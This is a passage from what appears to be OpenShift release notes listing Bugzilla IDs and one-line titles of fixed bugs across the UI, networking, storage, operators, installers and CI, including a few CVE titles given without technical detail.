Manual/RerunOnFailure\n1987136 - Declare operatorframework.io/arch.* labels for all operators\n1987257 - Go-http-client user-agent being used for oc adm mirror requests\n1987263 - fsSpaceFillingUpWarningThreshold not aligned to Kubernetes Garbage Collection Threshold\n1987445 - MetalLB integration: All gateway routers in the cluster answer ARP requests for LoadBalancer services IP\n1988406 - SSH key dropped when selecting \"Customize virtual machine\" in UI\n1988440 - Network operator changes ovnkube-config too early causing ovnkube-master pods to crashloop during cluster upgrade\n1988483 - Azure drop ICMP need to frag FRAG when using OVN: openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another 
master fails with "Unable to connect to the server"
1988879 - Virtual media based deployment fails on Dell servers due to pending Lifecycle Controller jobs
1989438 - expected replicas is wrong
1989502 - Developer Catalog is disappearing after short time
1989843 - 'More' and 'Show Less' functions are not translated on several page
1990014 - oc debug <pod-name> does not work for Windows pods
1990190 - e2e testing failed with basic manifest: reason/ExternalProvisioning waiting for a volume to be created
1990193 - 'more' and 'Show Less' is not being translated on Home -> Search page
1990255 - Partial or all of the Nodes/StorageClasses don't appear back on UI after text is removed from search bar
1990489 - etcdHighNumberOfFailedGRPCRequests fires only on metal env in CI
1990506 - Missing udev rules in initramfs for /dev/disk/by-id/scsi-* symlinks
1990556 - get-resources.sh doesn't honor the no_proxy settings even with no_proxy var
1990625 - Ironic agent registers with SLAAC address with privacy-stable
1990635 - CVO does not recognize the channel change if desired version and channel changed at the same time
1991067 - github.com can not be resolved inside pods where cluster is running on openstack
1991573 - Enable typescript strictNullCheck on network-policies files
1991641 - Baremetal Cluster Operator still Available After Delete Provisioning
1991770 - The logLevel and operatorLogLevel values do not work with Cloud Credential Operator
1991819 - Misspelled word "ocurred" in oc inspect cmd
1991942 - Alignment and spacing fixes
1992414 - Two rootdisks show on storage step if 'This is a CD-ROM boot source' is checked
1992453 - The configMap failed to save on VM environment tab
1992466 - The button 'Save' and 'Reload' are not translated on vm environment tab
1992475 - The button 'Open console in New Window' and 'Disconnect' are not translated on vm console tab
1992509 - Could not customize boot source due to source PVC not found
1992541 - all the alert rules' annotations "summary" and "description" should comply with the OpenShift alerting guidelines
1992580 - storageProfile should stay with the same value by check/uncheck the apply button
1992592 - list-type missing in oauth.config.openshift.io for identityProviders breaking Server Side Apply
1992777 - [IBMCLOUD] Default "ibm_iam_authorization_policy" is not working as expected in all scenarios
1993364 - cluster destruction fails to remove router in BYON with Kuryr as primary network (even after BZ 1940159 got fixed)
1993376 - periodic-ci-openshift-release-master-ci-4.6-upgrade-from-stable-4.5-e2e-azure-upgrade is permfailing
1994094 - Some hardcodes are detected at the code level in OpenShift console components
1994142 - Missing required cloud config fields for IBM Cloud
1994733 - MetalLB: IP address is not assigned to service if there is duplicate IP address in two address pools
1995021 - resolv.conf and corefile sync slows down/stops after keepalived container restart
1995335 - [SCALE] ovnkube CNI: remove ovs flows check
1995493 - Add Secret to workload button and Actions button are not aligned on secret details page
1995531 - Create RDO-based Ironic image to be promoted to OKD
1995545 - Project drop-down amalgamates inside main screen while creating storage system for odf-operator
1995887 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs
1995924 - CMO should report `Upgradeable: false` when HA workload is incorrectly spread
1996023 - kubernetes.io/hostname values are larger than filter when create localvolumeset from webconsole
1996108 - Allow backwards compatibility of shared gateway mode to inject host-based routes into OVN
1996624 - 100% of the cco-metrics/cco-metrics targets in openshift-cloud-credential-operator namespace are down
1996630 - Fail to delete the first Authorized SSH Key input box on Advanced page
1996647 - Provide more useful degraded message in auth operator on DNS errors
1996736 - Large number of 501 lr-policies in INCI2 env
1996886 - timedout waiting for flows during pod creation and ovn-controller pegged on worker nodes
1996916 - Special Resource Operator(SRO) - Fail to deploy simple-kmod on GCP
1996928 - Enable default operator indexes on ARM
1997028 - prometheus-operator update removes env var support for thanos-sidecar
1997059 - Failed to create cluster in AWS us-east-1 region due to a local zone is used
1997226 - Ingresscontroller reconcilations failing but not shown in operator logs or status of ingresscontroller
1997245 - "Subscription already exists in openshift-storage namespace" error message is seen while installing odf-operator via UI
1997269 - Have to refresh console to install kube-descheduler
1997478 - Storage operator is not available after reboot cluster instances
1997509 - flake: [sig-cli] oc builds new-build [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
1997967 - storageClass is not reserved from default wizard to customize wizard
1998035 - openstack IPI CI: custom var-lib-etcd.mount (ramdisk) unit is racing due to incomplete After/Before order
1998038 - [e2e][automation] add tests for UI for VM disk hot-plug
1998087 - Fix CephHealthCheck wrapping contents and add data-tests for HealthItem and SecondaryStatus
1998174 - Create storageclass gp3-csi after install ocp cluster on aws
1998183 - "r: Bad Gateway" info is improper
1998235 - Firefox warning: Cookie "csrf-token" will be soon rejected
1998377 - Filesystem table head is not full displayed in disk tab
1998378 - Virtual Machine is 'Not available' in Home -> Overview -> Cluster inventory
1998519 - Add fstype when create localvolumeset instance on web console
1998951 - Keepalived conf ingress peer on in Dual stack cluster contains both IPv6 and IPv4 addresses
1999076 - [UI] Page Not Found error when clicking on Storage link provided in Overview page
1999079 - creating pods before sriovnetworknodepolicy sync up succeed will cause node unschedulable
1999091 - Console update toast notification can appear multiple times
1999133 - removing and recreating static pod manifest leaves pod in error state
1999246 - .indexignore is not ingore when oc command load dc configuration
1999250 - ArgoCD in GitOps operator can't manage namespaces
1999255 - ovnkube-node always crashes out the first time it starts
1999261 - ovnkube-node log spam (and security token leak?)
1999309 - While installing odf-operator via UI, web console update pop-up navigates to OperatorHub -> Operator Installation page
1999314 - console-operator is slow to mark Degraded as False once console starts working
1999425 - kube-apiserver with "[SHOULD NOT HAPPEN] failed to update managedFields" err="failed to convert new object (machine.openshift.io/v1beta1, Kind=MachineHealthCheck)
1999556 - "master" pool should be updated before the CVO reports available at the new version occurred
1999578 - AWS EFS CSI tests are constantly failing
1999603 - Memory Manager allows Guaranteed QoS Pod with hugepages requested is exactly equal to the left over Hugepages
1999619 - cloudinit is malformatted if a user sets a password during VM creation flow
1999621 - Empty ssh_authorized_keys entry is added to VM's cloudinit if created from a customize flow
1999649 - MetalLB: Only one type of IP address can be assigned to service on dual stack cluster from a address pool that have both IPv4 and IPv6 addresses defined
1999668 - openshift-install destroy cluster panic's when given invalid credentials to cloud provider (Azure Stack Hub)
1999734 - IBM Cloud CIS Instance CRN missing in infrastructure manifest/resource
1999771 - revert "force cert rotation every couple days for development" in 4.10
1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function
1999796 - Openshift Console `Helm` tab is not showing helm releases in a namespace when there is high number of deployments in the same namespace
1999836 - Admin web-console inconsistent status summary of sparse ClusterOperator conditions
1999903 - Click "This is a CD-ROM boot source" ticking "Use template size PVC" on pvc upload form
1999983 - No way to clear upload error from template boot source
2000081 - [IPI baremetal] The metal3 pod failed to restart when switching from Disabled to Managed provisioning without specifying provisioningInterface parameter
2000096 - Git URL is not re-validated on edit build-config form reload
2000216 - Successfully imported ImageStreams are not resolved in DeploymentConfig
2000236 - Confusing usage message from dynkeepalived CLI
2000268 - Mark cluster unupgradable if vcenter, esxi versions or HW versions are unsupported
2000430 - bump cluster-api-provider-ovirt version in installer
2000450 - 4.10: Enable static PV multi-az test
2000490 - All critical alerts shipped by CMO should have links to a runbook
2000521 - Kube-apiserver CO degraded due to failed conditional check (ConfigObservationDegraded)
2000573 - Incorrect StorageCluster CR created and ODF cluster getting installed with 2 Zone OCP cluster
2000628 - ibm-flashsystem-storage-storagesystem got created without any warning even when the attempt was cancelled
2000651 - ImageStreamTag alias results in wrong tag and invalid link in Web Console
2000754 - IPerf2 tests should be lower
2000846 - Structure logs in the entire codebase of Local Storage Operator
2000872 - [tracker] container is not able to list on some directories within the nfs after upgrade to 4.7.24
2000877 - OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM
2000938 - CVO does not respect changes to a Deployment strategy
2000963 - 'Inline-volume (default fs)] volumes should store data' tests are failing on OKD with updated selinux-policy
2001008 - [MachineSets] CloneMode defaults to linkedClone, but I don't have snapshot and should be fullClone
2001240 - Remove response headers for downloads of binaries from OpenShift WebConsole
2001295 - Remove openshift:kubevirt-machine-controllers decleration from machine-api
2001317 - OCP Platform Quota Check - Inaccurate MissingQuota error
2001337 - Details Card in ODF Dashboard mentions OCS
2001339 - fix text content hotplug
2001413 - [e2e][automation] add/delete nic and disk to template
2001441 - Test: oc adm must-gather runs successfully for audit logs - fail due to startup log
2001442 - Empty termination.log file for the kube-apiserver has too permissive mode
2001479 - IBM Cloud DNS unable to create/update records
2001566 - Enable alerts for prometheus operator in UWM
2001575 - Clicking on the perspective switcher shows a white page with loader
2001577 - Quick search placeholder is not displayed properly when the search string is removed
2001578 - [e2e][automation] add tests for vm dashboard tab
2001605 - PVs remain in Released state for a long time after the claim is deleted
2001617 - BucketClass Creation is restricted on 1st page but enabled using side navigation options
2001620 - Cluster becomes degraded if it can't talk to Manila
2001760 - While creating 'Backing Store', 'Bucket Class', 'Namespace Store' user is navigated to 'Installed Operators' page after clicking on ODF
2001761 - Unable to apply cluster operator storage for SNO on GCP platform
2001765 - Some error message in the log of diskmaker-manager caused confusion
2001784 - show loading page before final results instead of showing a transient message No log files exist
2001804 - Reload feature on Environment section in Build Config form does not work properly
2001810 - cluster admin unable to view BuildConfigs in all namespaces
2001817 - Failed to load RoleBindings list that will lead to 'Role name' is not able to be selected on Create RoleBinding page as well
2001823 - OCM controller must update operator status
2001825 - [SNO]ingress/authentication clusteroperator degraded when enable ccm from start
2001835 - Could not select image tag version when create app from dev console
2001855 - Add capacity is disabled for ocs-storagecluster
2001856 - Repeating event: MissingVersion no image found for operand pod
2001959 - Side nav list borders don't extend to edges of container
2002007 - Layout issue on "Something went wrong" page
2002010 - ovn-kube may never attempt to retry a pod creation
2002012 - Cannot change volume mode when cloning a VM from a template
2002027 - Two instances of Dotnet helm chart show as one in topology
2002075 - opm render does not automatically pulling in the image(s) used in the deployments
2002121 - [OVN] upgrades failed for IPI OSP16 OVN IPSec cluster
2002125 - Network policy details page heading should be updated to Network Policy details
2002133 - [e2e][automation] add support/virtualization and improve deleteResource
2002134 - [e2e][automation] add test to verify vm details tab
2002215 - Multipath day1 not working on s390x
2002238 - Image stream tag is not persisted when switching from yaml to form editor
2002262 - [vSphere] Incorrect user agent in vCenter sessions list
2002266 - SinkBinding create form doesn't allow to use subject name, instead of label selector
2002276 - OLM fails to upgrade operators immediately
2002300 - Altering the Schedule Profile configurations doesn't affect the placement of the pods
2002354 - Missing DU configuration "Done" status reporting during ZTP flow
2002362 - Dynamic Plugin - ConsoleRemotePlugin for webpack doesn't use commonjs
2002368 - samples should not go degraded when image allowedRegistries blocks imagestream creation
2002372 - Pod creation failed due to mismatched pod IP address in CNI and OVN
2002397 - Resources search is inconsistent
2002434 - CRI-O leaks some children PIDs
2002443 - Getting undefined error on create local volume set page
2002461 - DNS operator performs spurious updates in response to API's defaulting of service's internalTrafficPolicy
2002504 - When the openshift-cluster-storage-operator is degraded because of "VSphereProblemDetectorController_SyncError", the insights operator is not sending the logs from all pods
2002559 - User preference for topology list view does not follow when a new namespace is created
2002567 - Upstream SR-IOV worker doc has broken links
2002588 - Change text to be sentence case to align with PF
2002657 - ovn-kube egress IP monitoring is using a random port over the node network
2002713 - CNO: OVN logs should have millisecond resolution
2002748 - [ICNI2] 'ErrorAddingLogicalPort' failed to handle external GW check: timeout waiting for namespace event
2002759 - Custom profile should not allow not including at least one required HTTP2 ciphersuite
2002763 - Two storage systems getting created with external mode RHCS
2002808 - KCM does not use web identity credentials
2002834 - Cluster-version operator does not remove unrecognized volume mounts
2002896 - Incorrect result return when user filter data by name on search page
2002950 - Why spec.containers.command is not created with "oc create deploymentconfig <dc-name> --image=<image> -- <command>"
2003096 - [e2e][automation] check bootsource URL is displaying on review step
2003113 - OpenShift Baremetal IPI installer uses first three defined nodes under hosts in install-config for master nodes instead of filtering the hosts with the master role
2003120 - CI: Uncaught error with ResizeObserver on operand details page
2003145 - Duplicate operand tab titles causes "two children with the same key" warning
2003164 - OLM, fatal error: concurrent map writes
2003178 - [FLAKE][knative] The UI doesn't show updated traffic distribution after accepting the form
2003193 - Kubelet/crio leaks netns and veth ports in the host
2003195 - OVN CNI should ensure host veths are removed
2003204 - Jenkins all new container images (openshift4/ose-jenkins) not supporting '-e JENKINS_PASSWORD=password' ENV which was working for old container images
2003206 - Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace
2003239 - "[sig-builds][Feature:Builds][Slow] can use private repositories as build input" tests fail outside of CI
2003244 - Revert libovsdb client code
2003251 - Patternfly components with list element has list item bullet when they should not
2003252 - "[sig-builds][Feature:Builds][Slow] starting a build using CLI start-build test context override environment BUILD_LOGLEVEL in buildconfig" tests do not work as expected outside of CI
2003269 - Rejected pods should be filtered from admission regression
2003357 - QE- Removing the epic tags for gherkin tags related to 4.9 Release
2003426 - [e2e][automation] add test for vm details bootorder
2003496 - [e2e][automation] add test for vm resources requirment settings
2003641 - All metal ipi jobs are failing in 4.10
2003651 - ODF4.9+LSO4.8 installation via UI, StorageCluster move to error state
2003655 - [IPI ON-PREM] Keepalived chk_default_ingress track script failed even though default router pod runs on node
2003683 - Samples operator is panicking in CI
2003711 - [UI] Empty file ceph-external-cluster-details-exporter.py downloaded from external cluster "Connection Details" page
2003715 - Error on creating local volume set after selection of the volume mode
2003743 - Remove workaround keeping /boot RW for kdump support
2003775 - etcd pod on CrashLoopBackOff after master replacement procedure
2003788 - CSR reconciler report error constantly when BYOH CSR approved by other Approver
2003792 - Monitoring metrics query graph flyover panel is useless
2003808 - Add Sprint 207 translations
2003845 - Project admin cannot access image vulnerabilities view
2003859 - sdn emits events with garbage messages
2003896 - (release-4.10) ApiRequestCounts conditional gatherer
2004009 - 4.10: Fix multi-az zone scheduling e2e for 5 control plane replicas
2004051 - CMO can report as being Degraded while node-exporter is deployed on all nodes
2004059 - [e2e][automation] fix current tests for downstream
2004060 - Trying to use basic spring boot sample causes crash on Firefox
2004101 - [UI] When creating storageSystem deployment type dropdown under advanced setting doesn't close after selection
2004127 - [flake] openshift-controller-manager event reason/SuccessfulDelete occurs too frequently
2004203 - build config's created prior to 4.8 with image change triggers can result in trigger storm in OCM/openshift-apiserver
2004313 - [RHOCP 4.9.0-rc.0] Failing to deploy Azure cluster from the macOS installer - ignition_bootstrap.ign: no such file or directory
2004449 - Boot option recovery menu prevents image boot
2004451 - The backup filename displayed in the RecentBackup message is incorrect
2004459 - QE - Modified the AddFlow gherkin scripts and automation scripts
2004508 - TuneD issues with the recent ConfigParser changes
2004510 - openshift-gitops operator hooks gets unauthorized (401) errors during jobs executions
2004542 - [osp][octavia lb] cannot create LoadBalancer type svcs
2004578 - Monitoring and node labels missing for an external storage platform
2004585 - prometheus-k8s-0 cpu usage keeps increasing for the first 3 days
2004596 - [4.10] Bootimage bump tracker
2004597 - Duplicate ramdisk log containers running
2004600 - Duplicate ramdisk log containers running
2004609 - output of "crictl inspectp" is not complete
2004625 - BMC credentials could be logged if they change
2004632 - When LE takes a large amount of time, multiple whereabouts are seen
2004721 - ptp/worker custom threshold doesn't change ptp events threshold
2004736 - [knative] Create button on new Broker form is inactive despite form being filled
2004796 - [e2e][automation] add test for vm scheduling policy
2004814 - (release-4.10) OCM controller - change type of the etc-pki-entitlement secret to opaque
2004870 - [External Mode] Insufficient spacing along y-axis in RGW Latency Performance Card
2004901 - [e2e][automation] improve kubevirt devconsole tests
2004962 - Console frontend job consuming too much CPU in CI
2005014 - state of ODF StorageSystem is misreported during installation or uninstallation
2005052 - Adding a MachineSet selector matchLabel causes orphaned Machines
2005179 - pods status filter is not taking effect
2005182 - sync list of deprecated apis about to be removed
2005282 - Storage cluster name is given as title in StorageSystem details page
2005355 - setuptools 58 makes Kuryr CI fail
2005407 - ClusterNotUpgradeable Alert should be set to Severity Info
2005415 - PTP operator with sidecar api configured throws bind: address already in use
2005507 - SNO spoke cluster failing to reach coreos.live.rootfs_url is missing url in console
2005554 - The switch status of the button "Show default project" is not revealed correctly in code
2005581 - 4.8.12 to 4.9 upgrade hung due to cluster-version-operator pod CrashLoopBackOff: error creating clients: invalid configuration: no configuration has been provided, try setting KUBERNETES_MASTER environment variable
2005761 - QE - Implementing crw-basic feature file
2005783 - Fix accessibility issues in the "Internal" and "Internal - Attached Mode" Installation Flow
2005811 - vSphere Problem Detector operator - ServerFaultCode: InvalidProperty
2005854 - SSH NodePort service is created for each VM
2005901 - KS, KCM and KA going Degraded during master nodes upgrade
2005902 - Current UI flow for MCG only deployment is confusing and doesn't reciprocate any message to the end-user
2005926 - PTP operator NodeOutOfPTPSync rule is using max offset from the master instead of openshift_ptp_clock_state metrics
2005971 - Change telemeter to report the Application Services product usage metrics
2005997 - SELinux domain container_logreader_t does not have a policy to follow sym links for log files
2006025 - Description to use an existing StorageClass while creating StorageSystem needs to be re-phrased
2006060 - ocs-storagecluster-storagesystem details are missing on UI for MCG Only and MCG only in LSO mode deployment types
2006101 - Power off fails for drivers that don't support Soft power off
2006243 - Metal IPI upgrade jobs are running out of disk space
2006291 - bootstrapProvisioningIP set incorrectly when provisioningNetworkCIDR doesn't use the 0th address
2006308 - Backing Store YAML tab on click displays a blank screen on UI
2006325 - Multicast is broken across nodes
2006329 - Console only allows Web Terminal Operator to be installed in OpenShift Operators
2006364 - IBM Cloud: Set resourceGroupId for resourceGroups, not simply resource
2006561 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't have failing rules evaluation [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2006690 - OS boot failure "x64 Exception Type 06 - Invalid Opcode Exception"
2006714 - add retry for etcd errors in kube-apiserver
2006767 - KubePodCrashLooping may not fire
2006803 - Set CoreDNS cache entries for forwarded zones
2006861 - Add Sprint 207 part 2 translations
2006945 - race condition can cause crashlooping bootstrap kube-apiserver in cluster-bootstrap
2006947 - e2e-aws-proxy for 4.10 is permafailing with samples operator errors
2006975 - clusteroperator/etcd status condition should not change reasons frequently due to EtcdEndpointsDegraded
2007085 - Intermittent failure mounting /run/media/iso when booting live ISO from USB stick
2007136 - Creation of BackingStore, BucketClass, NamespaceStore fails
2007271 - CI Integration for Knative test cases
2007289 - kubevirt tests are failing in CI
2007322 - Devfile/Dockerfile import does not work for unsupported git host
2007328 - Updated patternfly to v4.125.3 and pf.quickstarts to v1.2.3
2007379 - Events are not generated for master offset for ordinary clock
2007443 - [ICNI 2.0] Loadbalancer pods do not establish BFD sessions with all workers that host pods for the routed namespace
2007455 - cluster-etcd-operator: render command should fail if machineCidr contains reserved address
2007495 - Large label value for the metric kubelet_started_pods_errors_total with label message when there is a error
2007522 - No new local-storage-operator-metadata-container is build for 4.10
2007551 - No new ose-aws-efs-csi-driver-operator-bundle-container is build for 4.10
2007580 - Azure cilium installs are failing e2e tests
2007581 - Too many haproxy processes in default-router pod causing high load average after upgrade from v4.8.3 to v4.8.10
2007677 - Regression: core container io performance metrics are missing for pod, qos, and system slices on nodes
2007692 - 4.9 "old-rhcos" jobs are permafailing with storage test failures
2007710 - ci/prow/e2e-agnostic-cmd job is failing on prow
2007757 - must-gather extracts imagestreams in the "openshift" namespace, but not Templates
2007802 - AWS machine actuator get stuck if machine is completely missing
2008096 - TestAWSFinalizerDeleteS3Bucket sometimes fails to teardown operator
2008119 - The serviceAccountIssuer field on Authentication CR is reseted to "" when installation process
2008151 - Topology breaks on clicking in empty state
2008185 - Console operator go.mod should use go 1.16.version
2008201 - openstack-az job is failing on haproxy idle test
2008207 - vsphere CSI driver doesn't set resource limits
2008223 - gather_audit_logs: fix oc command line to get the current audit profile
2008235 - The Save button in the Edit DC form remains disabled
2008256 - Update Internationalization README with scope info
2008321 - Add correct documentation link for MON_DISK_LOW
2008462 - Disable PodSecurity feature gate for 4.10
2008490 - Backing store details page does not contain all the kebab actions
2008521 - gcp-hostname service should correct invalid search entries in resolv.conf
2008532 - CreateContainerConfigError:: failed to prepare subPath for volumeMount
2008539 - Registry doesn't fall back to secondary ImageContentSourcePolicy Mirror
2008540 - HighlyAvailableWorkloadIncorrectlySpread always fires on upgrade on cluster with two workers
2008599 - Azure Stack UPI does not have Internal Load Balancer
2008612 - Plugin asset proxy does not pass through browser cache headers
2008712 - VPA webhook timeout prevents all pods from starting
2008733 - kube-scheduler: exposed /debug/pprof port
2008911 - Prometheus repeatedly scaling prometheus-operator replica set
2008926 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]
2008987 - OpenShift SDN Hosted Egress IP's are not being scheduled to nodes after upgrade to 4.8.12
2009055 - Instances of OCS to be replaced with ODF on UI
2009078 - NetworkPodsCrashLooping alerts in upgrade CI jobs
2009083 - opm blocks pruning of existing bundles during add
2009111 - [IPI-on-GCP] 'Install a cluster with nested virtualization enabled' failed due to unable to launch compute instances
2009131 - [e2e][automation] add more test about vmi
2009148 - [e2e][automation] test vm nic presets and options
2009233 - ACM policy object generated by PolicyGen conflicting with OLM Operator
2009253 - [BM] [IPI] [DualStack] apiVIP and ingressVIP should be of the same primary IP family
2009298 - Service created for VM SSH access is not owned by the VM and thus is not deleted if the VM is deleted
2009384 - UI changes to support BindableKinds CRD changes
2009404 - ovnkube-node pod enters CrashLoopBackOff after OVN_IMAGE is swapped
2009424 - Deployment upgrade is failing availability check
2009454 - Change web terminal subscription permissions from get to list
2009465 - container-selinux should come from rhel8-appstream
2009514 - Bump OVS to 2.16-15
2009555 - Supermicro X11 system not booting from vMedia with AI
2009623 - Console: Observe > Metrics page: Table pagination menu shows bullet points
2009664 - Git Import: Edit of knative service doesn't work as expected for git import flow
2009699 - Failure to validate flavor RAM
2009754 - Footer is not sticky anymore in import forms
2009785 - CRI-O's version file should be pinned by MCO
2009791 - Installer: ibmcloud ignores install-config values
2009823 - [sig-arch] events should not repeat pathologically - reason/VSphereOlderVersionDetected Marking cluster un-upgradeable because one or more VMs are on hardware version vmx-13
2009840 - cannot build extensions on aarch64 because of unavailability of rhel-8-advanced-virt repo
2009859 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests
2009873 - Stale Logical Router Policies and Annotations for a given node
2009879 - There should be test-suite coverage to ensure admin-acks work as expected
2009888 - SRO package name collision between official and community version
2010073 - uninstalling and then reinstalling sriov-network-operator is not working
2010174 - 2 PVs get created unexpectedly with different paths that actually refer to the same device on the node
2010181 - Environment variables not getting reset on reload on deployment edit form
2010310 - [sig-instrumentation][Late] OpenShift alerting rules should have description and summary annotations [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2010341 - OpenShift Alerting Rules Style-Guide Compliance
2010342 - Local console builds can have out of memory errors
2010345 - OpenShift Alerting Rules Style-Guide Compliance
2010348 - Reverts PIE build mode for K8S components
2010352 - OpenShift Alerting Rules Style-Guide Compliance
2010354 - OpenShift Alerting Rules Style-Guide Compliance
2010359 - OpenShift Alerting Rules Style-Guide Compliance
2010368 - OpenShift Alerting Rules Style-Guide Compliance
2010376 - OpenShift Alerting Rules Style-Guide Compliance
2010662 - Cluster is unhealthy after image-registry-operator tests
2010663 - OpenShift Alerting Rules Style-Guide Compliance (ovn-kubernetes subcomponent)
2010665 - Bootkube tries to use oc after cluster bootstrap is done and there is no API
2010698 - [BM] [IPI] [Dual Stack] Installer must ensure ipv6 short forms too if clusterprovisioning IP is specified as ipv6 address
2010719 - etcdHighNumberOfFailedGRPCRequests runbook is missing
2010864 - Failure building EFS operator
2010910 - ptp worker events unable to identify interface for multiple interfaces
2010911 - RenderOperatingSystem() returns wrong OS version on OCP 4.7.24
2010921 - Azure Stack Hub does not handle additionalTrustBundle
2010931 - SRO CSV uses non default category "Drivers and plugins"
2010946 - concurrent CRD from ovirt-csi-driver-operator gets reconciled by CVO after deployment, changing CR as well
2011038 - optional operator conditions are confusing
2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass
2011171 - diskmaker-manager constantly redeployed by LSO when creating LV's
2011293 - Build pod are not pulling images if we are not explicitly giving the registry name with the image
2011368 - Tooltip in pipeline visualization shows misleading data
2011386 - [sig-arch] Check if alerts are firing during or after upgrade success --- alert KubePodNotReady fired for 60 seconds with labels
2011411 - Managed Service's Cluster overview page contains link to missing Storage dashboards
2011443 - Cypress tests assuming Admin Perspective could fail on shared/reference cluster
2011513 - Kubelet rejects pods that use resources that should be freed by completed pods
2011668 - Machine stuck in deleting phase in VMware "reconciler failed to Delete machine"
2011693 - (release-4.10) "insightsclient_request_recvreport_total" metric is always incremented
2011698 - After upgrading cluster to 4.8 the kube-state-metrics service doesn't export namespace labels anymore
2011733 - Repository README points to broken documentarion link
2011753 - Ironic resumes clean before raid configuration job is actually completed
2011809 - The nodes page in the openshift console doesn't work. You just get a blank page
2011822 - Obfuscation doesn't work at clusters with OVN
2011882 - SRO helm charts not synced with templates
2011893 - Validation: BMC driver ipmi is not supported for secure UEFI boot
2011896 - [4.10] ClusterVersion Upgradeable=False MultipleReasons should include all messages
2011903 - vsphere-problem-detector: session leak
2011927 - OLM should allow users to specify a proxy for GRPC connections
2011956 - [tracker] Kubelet rejects pods that use resources that should be freed by completed pods
2011960 - [tracker] Storage operator is not available after reboot cluster instances
2011971 - ICNI2 pods are stuck in ContainerCreating state
2011972 - Ingress operator not creating wildcard route for hypershift clusters
2011977 - SRO bundle references non-existent image
2012069 - Refactoring Status controller
2012177 - [OCP 4.9 + OCS 4.8.3] Overview tab is missing under Storage after successful deployment on UI
2012228 - ibmcloud: credentialsrequests invalid for machine-api-operator: resource-group
2012233 - [IBMCLOUD] IPI: "Exceeded limit of remote rules per security group (the limit is 5 remote rules per security group)"
2012235 - [IBMCLOUD] IPI: IBM cloud provider requires ResourceGroupName in cloudproviderconfig
2012317 - Dynamic Plugins: ListPageCreateDropdown items cut off
2012407 - [e2e][automation] improve vm tab console tests
2012426 - ThanosSidecarBucketOperationsFailed/ThanosSidecarUnhealthy alerts don't have namespace label
2012562 - migration condition is not detected in list view
2012770 - when using expression metric openshift_apps_deploymentconfigs_last_failed_rollout_time namespace label is re-written
2012780 - The port 50936 used by haproxy is occupied by kube-apiserver
2012838 - Setting the default maximum container root partition size for Overlay with CRI-O stop working
2012902 - Neutron Ports assigned to Completed Pods are not reused Edit
2012915 - kube_persistentvolumeclaim_labels and kube_persistentvolume_labels are missing in OCP 4.8 monitoring stack
2012971 - Disable operands deletes
2013034 - Cannot install to openshift-nmstate namespace
2013127 - OperatorHub links could not be opened in a new tabs (sharing and open a deep link works fine)
2013199 - post reboot of node SRIOV policy taking huge time
2013203 - UI breaks when trying to create block pool before storage cluster/system creation
2013222 - Full breakage for nightly payload promotion
2013273 - Nil pointer exception when phc2sys options are missing
2013321 - TuneD: high CPU utilization of the TuneD daemon
2013416 - Multiple assets emit different content to the same filename
2013431 - Application selector dropdown has incorrect font-size and positioning
2013528 - mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8
2013545 - Service binding created outside topology is not visible
2013599 - Scorecard support storage is not included in ocp4.9
2013632 - Correction/Changes in Quick Start Guides for ODF 4.9 (Install ODF guide)
2013646 - fsync controller will show false positive if gaps in metrics are observed
2013710 - ZTP Operator subscriptions for 4.9 release branch should point to 4.9 by default
2013751 - Service details page is showing wrong in-cluster hostname
2013787 - There are two tittle 'Network Attachment Definition Details' on NAD details page
2013871 - Resource table headings are not aligned with their column data
2013895 - Cannot enable accelerated network via MachineSets on Azure
2013920 - "--collector.filesystem.ignored-mount-points is DEPRECATED and will be removed in 2.0.0, use --collector.filesystem.mount-points-exclude"
2013930 - Create Buttons enabled for Bucket Class, Backingstore and Namespace Store in the absence of Storagesystem(or MCG)
2013969 - oVIrt CSI driver fails on creating PVCs on hosted engine storage domain
2013990 - Observe dashboard crashs on reload when perspective has changed (in another tab)
2013996 - Project detail page: Action "Delete Project" does nothing for the default project
2014071 - Payload imagestream new tags not properly updated during cluster upgrade
2014153 - SRIOV exclusive pooling
2014202 - [OCP-4.8.10] OVN-Kubernetes: service IP is not responding when egressIP set to the namespace
2014238 - AWS console test is failing on importing duplicate YAML definitions
2014245 - Several aria-labels, external links, and labels aren't internationalized
2014248 - Several files aren't internationalized
2014352 - Could not filter out machine by using node name on machines page
2014464 - Unexpected spacing/padding below navigation groups in developer perspective
2014471 - Helm Release notes tab is not automatically open after installing a chart for other languages
2014486 - Integration Tests: OLM single namespace operator tests failing
2014488 - Custom operator cannot change orders of condition tables
2014497 - Regex slows down different forms and creates too much recursion errors in the log
2014538 - Kuryr controller crash looping on self._get_vip_port(loadbalancer).id 'NoneType' object has no attribute 'id'
2014614 - Metrics scraping requests should be assigned to exempt priority level
2014710 - TestIngressStatus test is broken on Azure
2014954 - The prometheus-k8s-{0,1} pods are CrashLoopBackoff repeatedly
2014995 - oc adm must-gather cannot gather audit logs with 'None' audit profile
2015115 - [RFE] PCI passthrough
2015133 - [IBMCLOUD] ServiceID API key credentials seems to be insufficient for ccoctl '--resource-group-name' parameter
2015154 - Support ports defined networks and primarySubnet
2015274 - Yarn dev fails after updates to dynamic plugin JSON schema logic
2015337 - 4.9.0 GA MetalLB operator image references need to be adjusted to match production
2015386 - Possibility to add labels to the built-in OCP alerts
2015395 - Table head on Affinity Rules modal is not fully expanded
2015416 - CI implementation for Topology plugin
2015418 - Project Filesystem query returns No datapoints found
2015420 - No vm resource in project view's inventory
2015422 - No conflict checking on snapshot name
2015472 - Form and YAML view switch button should have distinguishable status
2015481 - [4.10] sriov-network-operator daemon pods are failing to start
2015493 - Cloud Controller Manager Operator does not respect 'additionalTrustBundle' setting
2015496 - Storage - PersistentVolumes : Claim colum value 'No Claim' in English
2015498 - [UI] Add capacity when not applicable (for MCG only deployment and External mode cluster) fails to pass any info. to user and tries to just load a blank screen on 'Add Capacity' button click
2015506 - Home - Search - Resources - APIRequestCount : hard to select an item from ellipsis menu
